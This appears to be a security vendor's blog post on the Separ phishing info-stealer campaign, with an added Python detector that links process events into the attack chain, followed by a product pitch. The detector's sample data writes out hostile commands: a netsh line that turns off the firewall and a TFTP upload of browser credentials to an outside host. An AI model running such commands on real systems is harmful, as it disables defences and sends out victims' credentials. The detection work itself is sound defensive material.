Over the last week, more has been made public about the Separ malware phishing campaign that has been making the rounds since the end of January. Threatpost states that “it has affected around 200 companies and over 1,000 individuals, located mainly in Southeast Asia, the Middle East, and North America”. The effectiveness of this malware comes from its combination of legitimate executable files and short scripts, with no attempt by the attacker to evade analysis.
Separ’s earlier variants have existed since November 2017, and info-stealers of this kind have been active as far back as 2013, so this is not new malware. What has made this attack so effective is that it is launched using legitimate files that are either common within the organizations being targeted or are widely used administrative tools; these legitimate files and executables are abused to perform the info-stealing that is the underlying goal.
The attack starts with a phishing email carrying the malicious attachment, often a self-extracting executable disguised as a PDF document and related to normal business activities such as quotations or shipments. Once clicked, the self-extractor runs a Visual Basic script that executes a series of short batch scripts with malicious functions, often masquerading as fake Adobe-related programs. Then it’s off to the races: the scripts change firewall settings, steal email and browser credentials, and so on, eventually using TFTP to upload the stolen data.
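The chain just described (a disguised self-extractor, a script interpreter, batch scripts, firewall changes, a TFTP upload) is mostly made of legitimate Windows programs, so no single process looks malicious; what gives it away is the ancestry linking those steps. The following is an added example, not code from Wedge Networks or from the Separ campaign itself, showing how a defender can correlate process-creation telemetry into that chain. The event tuples are constructed, and the image names (wscript.exe, cmd.exe, netsh.exe, tftp.exe) are assumptions about how each stage typically surfaces in Windows process logs.

```python
"""Correlate Windows process-creation events into a Separ-like multi-stage chain.

Added example for illustration; not Wedge Networks code. The event sample is
constructed, and the stage predicates are assumptions about how a script-host
launched from a disguised self-extractor, its batch scripts, firewall tampering
and a TFTP upload usually appear in process telemetry.
"""
from collections import defaultdict

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Constructed sample telemetry: (pid, parent pid, image name, command line).
EVENTS = [
    (100, 1,   "explorer.exe",      "explorer.exe"),
    (201, 100, "outlook.exe",       "outlook.exe"),
    (310, 201, "quotation.pdf.exe", "quotation.pdf.exe"),  # self-extractor posing as a PDF
    (320, 310, "wscript.exe",       "wscript.exe adobe_update.vbs"),
    (330, 320, "cmd.exe",           "cmd.exe /c adobe1.bat"),
    (340, 330, "netsh.exe",         "netsh advfirewall set allprofiles state off"),
    (350, 320, "cmd.exe",           "cmd.exe /c adobe2.bat"),
    (360, 350, "tftp.exe",          "tftp.exe -i 203.0.113.5 put browser_creds.txt"),
    # Benign noise: an administrator inspecting firewall state from a console.
    (400, 100, "cmd.exe",           "cmd.exe"),
    (410, 400, "netsh.exe",         "netsh advfirewall show allprofiles"),
]

# Each stage is a predicate on (image name, command line); order does not matter.
STAGES = [
    ("script_host",     lambda img, cl: img in SCRIPT_HOSTS),
    ("batch_script",    lambda img, cl: img == "cmd.exe" and ".bat" in cl.lower()),
    ("firewall_tamper", lambda img, cl: img == "netsh.exe" and " set " in cl.lower()),
    ("tftp_upload",     lambda img, cl: img == "tftp.exe" and " put " in cl.lower()),
]


def stage_of(image, cmdline):
    """Return the stage label an event matches, or None if it matches nothing."""
    for name, predicate in STAGES:
        if predicate(image, cmdline):
            return name
    return None


def script_host_root(pid, parent_of, image_of):
    """Walk up the parent chain; return the nearest script-host ancestor (inclusive) or None."""
    seen = set()
    cur = pid
    while cur in image_of and cur not in seen:
        seen.add(cur)
        if image_of[cur] in SCRIPT_HOSTS:
            return cur
        cur = parent_of[cur]
    return None


def find_separ_like_chains(events, required=("script_host", "batch_script")):
    """Group staged events under the script host that spawned them and flag trees
    that contain the required stages plus at least one impact stage."""
    parent_of = {pid: ppid for pid, ppid, _, _ in events}
    image_of = {pid: img for pid, _, img, _ in events}
    stages_by_root = defaultdict(set)
    for pid, _, img, cl in events:
        stage = stage_of(img, cl)
        if stage is None:
            continue
        root = script_host_root(pid, parent_of, image_of)
        if root is not None:
            stages_by_root[root].add(stage)

    alerts = {}
    for root, stages in stages_by_root.items():
        impact = {"firewall_tamper", "tftp_upload"} & stages
        if all(s in stages for s in required) and impact:
            dropper = image_of.get(parent_of[root], "?")
            alerts[root] = {
                "stages": sorted(stages),
                "dropper": dropper,
                # A second extension such as ".pdf.exe" is the "fake PDF" trick from the text.
                "double_extension": dropper.lower().count(".") >= 2,
            }
    return alerts


if __name__ == "__main__":
    for root, info in find_separ_like_chains(EVENTS).items():
        print(f"script host pid {root} dropped by {info['dropper']}: {info['stages']}")
```

The benign netsh "show" under an interactive cmd.exe is not flagged because it has no script-host ancestor and matches no stage, which is the point of correlating on ancestry rather than on individual binaries.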
What makes this attack so successful is that it uses multiple vectors, many of which are not caught by the malware solutions on the market because the attack relies on legitimate executable files. Oftentimes, even the most up-to-date malware databases will not list these files. Thankfully, there are solutions, such as the Wedge Advanced Malware Blocker with its Deep Content Inspection technology combined with AI algorithms, that can see the whole picture and piece together the multiple vectors this campaign uses. Using its deep-learning AI engine, WedgeAMB can catch attacks such as these in the first phase of infection by looking at the actions of the Adobe installer and checking whether any malicious activity is occurring, even within this legitimate executable file.
Unlike many other solutions on the market, WedgeAMB reassembles all content in the network stream in real time and blocks that content if its intent is malicious. This is a clear advantage, especially when attacks such as Separ use multiple vectors, many of which may sit inside legitimate files and executables.
With Separ and similar attacks on the horizon, organizations should take a look at solutions that can “see” the whole picture and stop malicious activities in real time, before they can do any damage within their networks. If you are facing such Separ problems and are committed to building an infrastructure that can withstand such attacks, e-mail us at firstname.lastname@example.org. Our great team of engineers would be very willing to help!